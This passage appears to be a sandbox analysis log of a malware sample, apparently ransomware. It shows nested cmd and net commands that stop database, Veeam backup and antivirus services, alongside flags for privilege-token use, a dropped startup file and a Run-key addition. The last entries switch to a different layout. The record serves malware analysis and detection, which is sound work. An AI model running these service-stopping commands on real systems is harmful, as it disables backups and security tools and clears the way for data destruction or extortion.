C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"5⤵PID:4936
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵PID:2236
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"4⤵PID:1920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"5⤵PID:3136
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵PID:4276
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵PID:2324
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵PID:1472
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"5⤵PID:4388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵PID:636
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"4⤵PID:4296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"5⤵PID:2292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:4468
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:4992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:4152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵PID:4188
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵PID:340
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵PID:888
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"4⤵PID:3676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"5⤵PID:4980
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵PID:976
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵PID:660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵PID:3684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵PID:4400
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵PID:2696
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵PID:4552
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵PID:1776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵PID:2684
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵PID:1520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵PID:3048
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵PID:4312
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵PID:4360
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵PID:4572
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵PID:3500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵PID:4192
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵PID:4204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵PID:4584
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵PID:1216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵PID:4568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵PID:896
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵PID:1132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵PID:4540
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵PID:2952
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵PID:4268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵PID:3932
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵PID:4636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵PID:1272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵PID:4804
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵PID:904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵PID:4000
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵PID:416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵PID:5020
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵PID:1072
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵PID:596
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵PID:4800
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵PID:4460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵PID:2452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵PID:4828
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵PID:4844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵PID:3968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵PID:2024
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵PID:4764
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵PID:4772
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵PID:4940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵PID:5116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵PID:4840
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵PID:700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵PID:2136
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵PID:1380
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵PID:5100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵PID:4848
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵PID:3664
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵PID:388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵PID:4892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵PID:4908
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵PID:3344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵PID:252
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵PID:3496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵PID:276
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵PID:4920
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵PID:3724
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵PID:4912
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵PID:412
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵PID:3136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵PID:4932
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵PID:3228
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵PID:1152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵PID:4116
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵PID:4388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵PID:3440
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵PID:1472
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵PID:2240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵PID:3040
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵PID:3028
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵PID:4992
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵PID:2964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵PID:3768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵PID:2612
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵PID:2908
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵PID:3760
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵PID:1796
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵PID:4404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵PID:3684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵PID:4524
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"4⤵PID:1264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"5⤵PID:2696
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵PID:2392
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵PID:3816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵PID:1776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵PID:3000
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵PID:2096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵PID:1360
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵PID:4340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵PID:4308
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵PID:4536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:4628
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:3500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵PID:1688
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵PID:3060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵PID:4196
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵PID:4568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵PID:4200
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵PID:896
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵PID:4432
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵PID:1964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵PID:4268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵PID:1388
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵PID:4832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵PID:1272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵PID:1028
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵PID:3648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵PID:5032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵PID:4804
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
- Drops startup file
PID:488
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵PID:4500
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵PID:1220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵PID:1268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵PID:344
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵PID:4132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵PID:5004
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵PID:5016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵PID:940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵PID:2080
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵PID:5012
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵PID:4944
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵PID:5104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵PID:1980
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵PID:3480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵PID:4780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵PID:2116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵PID:5096
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵PID:1104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵PID:4848
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵PID:5100
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵PID:4904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵PID:388
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵PID:3664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵PID:2156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵PID:1224
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵PID:1172
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵PID:276
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵PID:2180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵PID:252
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵PID:260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵PID:3120
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵PID:3392
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵PID:3148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵PID:2124
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵PID:4280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵PID:2236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵PID:4928
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵PID:3136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵PID:2632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
- Adds Run key to start application
PID:1464 -
C:\Windows\system32\net.exenet stop "W3Svc"4⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵PID:1684
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵PID:3228
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵PID:2028
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵PID:3620
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:4388
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:4116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:4296
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4112 -
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:5024
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵PID:4444
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵PID:4212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵PID:4152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵PID:4396
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵PID:3920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵PID:2456
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵PID:3528
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵PID:4508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵PID:2908
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵PID:3684
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵PID:2108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵PID:888
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵PID:2696
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵PID:976
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵PID:1372
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵PID:4400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵PID:1928
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵PID:3000
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵PID:664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵PID:3424
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵PID:964
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵PID:364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵PID:2412
-
-
-
-
[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"  |  PID:4628
    - Suspicious use of AdjustPrivilegeToken
  [4] C:\Windows\system32\net.exe  |  net stop "msftesql$PROD"  |  PID:2256
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "msftesql$PROD"  |  PID:3860
        - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"  |  PID:1688
  [4] C:\Windows\system32\net.exe  |  net stop "NetMsmqActivator"  |  PID:4224
